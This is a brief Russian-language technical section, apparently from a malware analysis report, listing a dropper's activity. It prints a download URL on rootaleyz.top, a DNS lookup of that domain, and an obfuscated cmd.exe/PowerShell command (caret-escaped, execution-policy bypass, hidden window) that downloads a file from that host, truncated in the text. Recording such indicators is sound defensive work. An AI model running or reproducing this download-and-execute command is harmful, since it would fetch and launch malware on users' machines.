Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^er^s^H^Ell.^EXe -^E^XEC^U^t^IONP^o^l^ICY^ bYP^Ass ^-^n^OP^Ro^F^il^E -Win^dO^W^sTYLE H^i^D^DeN ^(^nEW-^OBJ^EcT SySt^E^m^.NE^t.WEbclienT)^.^doWN^LOaDF^il^E^('http://rootaley...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^er^s^H^Ell.^EXe -^E^XEC^U^t^IONP^o^l^ICY^ bYP^Ass ^-^n^OP^Ro^F^il^E -Win^dO^W^sTYLE H^i^D^DeN ^(^nEW-^OBJ^EcT SySt^E^m^.NE^t.WEbclienT)^.^doWN^LOaDF^il^E^('http://rootaley...' (со скрытым окном)